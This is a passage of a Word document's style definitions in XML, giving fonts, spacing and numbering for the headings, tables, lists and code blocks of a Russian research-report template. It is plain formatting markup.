    <w:name w:val="List Bullet 5"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:ind w:firstLine="209"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f2">
    <w:name w:val="1_Шифр_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="140">
    <w:name w:val="1_Заголовок 4_НИР"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="114"/>
    <w:link w:val="141"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1843"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:right="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="141">
    <w:name w:val="1_Заголовок 4_НИР Знак"/>
    <w:link w:val="140"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af1">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f3">
    <w:name w:val="1_Список_а)_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1134"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="Заголовок 5 Знак"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF3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BF38E3"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ab">
    <w:name w:val="Выделенная цитата Знак"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af0">
    <w:name w:val="Текст Знак"/>
    <w:link w:val="af"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f4">
    <w:name w:val="1_Введение_Заключение_Источники_НИР"/>
    <w:basedOn w:val="af"/>
    <w:next w:val="114"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Полужирный" w:hAnsi="Times New Roman Полужирный" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af2">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af3">
    <w:name w:val="Текст выноски Знак"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af4">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af5">
    <w:name w:val="Текст примечания Знак"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="52">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="53"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="3827" w:hanging="1134"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="142">
    <w:name w:val="1_Заголовок 4 Для приложений_НИР Знак"/>
    <w:basedOn w:val="40"/>
    <w:link w:val="14"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af6">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"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rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af8">
    <w:name w:val="footnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="60">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="61"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="5103" w:hanging="1276"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f5">
    <w:name w:val="1_Содержание_НИР"/>
    <w:basedOn w:val="1C1"/>
    <w:next w:val="a1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto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customStyle="1" w:styleId="1f6">
    <w:name w:val="1_Рисунок_НИР"/>
    <w:next w:val="18"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="120"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:noProof/>
      <w:szCs w:val="24"/>
      <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1c">
    <w:name w:val="1_Список литературы_НИР"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="709"/>
      <w:contextualSpacing w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="114">
    <w:name w:val="1_Текст 14_НИР"/>
    <w:basedOn w:val="af9"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Noto Sans CJK SC"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="28"/>
      <w:szCs w:val="26"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afa">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="af4"/>
    <w:next w:val="af4"/>
    <w:link w:val="afb"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afb">
    <w:name w:val="Тема примечания Знак"/>
    <w:link w:val="afa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="1b">
    <w:name w:val="1_Маркированный многоуровневый_НИР"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afc">
    <w:name w:val="Date"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="afd"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afd">
    <w:name w:val="Дата Знак"/>
    <w:link w:val="afc"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afe">
    <w:name w:val="annotation reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="13">
    <w:name w:val="1_Заголовок 3 Для приложений_НИР"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="114"/>
    <w:link w:val="131"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="709"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="1_Заголовок 4 Для приложений_НИР"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="114"/>
    <w:link w:val="142"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1843"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:right="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f7">
    <w:name w:val="1_Ключевые_слова_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="114"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="709"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f8">
    <w:name w:val="1_Реферат_Список Исполнителей_НИР"/>
    <w:basedOn w:val="1f4"/>
    <w:next w:val="114"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f9">
    <w:name w:val="1_УДК_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:overflowPunct w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:ind w:firstLine="29"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:kern w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aff0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff0">
    <w:name w:val="Основной текст Знак"/>
    <w:link w:val="aff"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="111">
    <w:name w:val="1_Список_1)_НИР"/>
    <w:basedOn w:val="af9"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1134"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1fa">
    <w:name w:val="1_Код ПО_НИР Знак"/>
    <w:link w:val="1fb"/>
    <w:uiPriority w:val="5"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="BookAntiqua" w:hAnsi="Courier New"/>
      <w:noProof/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1fb">
    <w:name w:val="1_Код ПО_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="1fa"/>
    <w:uiPriority w:val="5"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E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spacing w:after="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="113"/>
      <w:contextualSpacing/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="BookAntiqua" w:hAnsi="Courier New"/>
      <w:noProof/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1fc">
    <w:name w:val="1_Вид документа_на_титуле_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1120">
    <w:name w:val="1_Таблица_12л_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="4"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:overflowPunct w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:ind w:left="57" w:right="57"/>
      <w:contextualSpacing/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="28"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1121">
    <w:name w:val="1_Таблица_12ц_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="1120"/>
    <w:uiPriority w:val="4"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:suppressAutoHyphens/>
      <w:kinsoku w:val="0"/>
      <w:overflowPunct w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="57" w:right="57"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="28"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1140">
    <w:name w:val="1_Таблица_14л_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="4"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:ind w:left="57" w:right="57"/>
      <w:contextualSpacing/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1141">
    <w:name w:val="1_Таблица_14ц_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="1140"/>
    <w:uiPriority w:val="4"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="57" w:right="57"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:iCs/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="19">
    <w:name w:val="1_Название таблицы_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:uiPriority w:val="4"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1fd">
    <w:name w:val="1_Гриф_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1fe">
    <w:name w:val="1_УТВЕРЖДАЮ_СОГЛАСОВАНО_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="1140"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="4820"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="120">
    <w:name w:val="1_Заголовок 2_НИР"/>
    <w:basedOn w:val="20"/>
    <w:next w:val="114"/>
    <w:link w:val="122"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="130">
    <w:name w:val="1_Заголовок 3_НИР"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="114"/>
    <w:link w:val="132"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="709"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="150">
    <w:name w:val="1_Заголовок 5_НИР"/>
    <w:basedOn w:val="50"/>
    <w:next w:val="114"/>
    <w:link w:val="151"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1985"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff1">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="131">
    <w:name w:val="1_Заголовок 3 Для приложений_НИР Знак"/>
    <w:basedOn w:val="30"/>
    <w:link w:val="13"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff">
    <w:name w:val="1_Таблица терминов_НИР"/>
    <w:basedOn w:val="1140"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0"/>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff0">
    <w:name w:val="1_Место_Год_НИР"/>
    <w:basedOn w:val="1f2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff2">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="1">
    <w:name w:val="1_Нумерация формул_НИР"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="121">
    <w:name w:val="1_Заголовок 2 Для приложений_НИР Знак"/>
    <w:basedOn w:val="30"/>
    <w:link w:val="12"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="132">
    <w:name w:val="1_Заголовок 3_НИР Знак"/>
    <w:link w:val="130"/>
    <w:locked/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="Название объекта Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff3">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
